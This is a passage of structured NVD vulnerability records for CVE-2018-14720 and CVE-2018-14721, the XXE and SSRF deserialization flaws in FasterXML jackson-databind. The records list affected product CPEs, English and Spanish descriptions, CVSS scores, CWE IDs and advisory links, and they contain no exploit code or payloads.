"cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr3:*:*:*:*:*:*", matchCriteriaId: "75836E44-81A6-42C0-A589-A990887C7F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr4:*:*:*:*:*:*", matchCriteriaId: "F794F46D-8B49-43FE-9EE0-4ECD20F9BCB0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", 
matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "0952BA1A-5DF9-400F-B01F-C3A398A8A2D4", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", matchCriteriaId: "2F87326E-0B56-4356-A889-73D026DB1D4B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes realizar ataques de tipo XML External Entity Injection (XXE) aprovechando su incapacidad de bloquear clases JDK no especificadas de deserialización polimórfica.", }, ], id: "CVE-2018-14720", lastModified: "2024-11-21T03:49:40.270", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: 
"PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.467", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", url: 
"https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", 
], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: 
"https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "A1BA8F04-46A7-4804-A997-59080034013F", versionEndExcluding: "2.6.7.2", versionStartIncluding: "2.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc1:*:*:*:*:*:*", matchCriteriaId: "C43DF125-AD83-4402-BF82-72542F898D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc2:*:*:*:*:*:*", matchCriteriaId: "E2DD9CB6-7456-417A-A816-32BD8EC5FA83", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc3:*:*:*:*:*:*", matchCriteriaId: "80428392-1050-4980-BF13-49CE32F96478", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc1:*:*:*:*:*:*", matchCriteriaId: "ADA0D863-2917-4E7B-8FF6-B499180D2D4C", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc2:*:*:*:*:*:*", matchCriteriaId: "ED1E9904-73E0-45F3-86A9-6173EE67E74D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr1:*:*:*:*:*:*", matchCriteriaId: "B1618FF9-0FDC-44BA-9FDA-5EA843C0D2D5", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr2:*:*:*:*:*:*", matchCriteriaId: "3FEDB0BC-FE4C-4851-A142-96767E337898", vulnerable: true, }, { criteria: 
"cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr3:*:*:*:*:*:*", matchCriteriaId: "75836E44-81A6-42C0-A589-A990887C7F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr4:*:*:*:*:*:*", matchCriteriaId: "F794F46D-8B49-43FE-9EE0-4ECD20F9BCB0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", 
matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "0952BA1A-5DF9-400F-B01F-C3A398A8A2D4", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", matchCriteriaId: "2F87326E-0B56-4356-A889-73D026DB1D4B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos realizar ataques de SSRF (Server-Side Request Forgery) aprovechando que no se bloquea la clase axis2-jaxws en la deserialización polimórfica.", }, ], id: "CVE-2018-14721", lastModified: "2024-11-21T03:49:40.523", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", 
integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 10, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.543", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", url: 
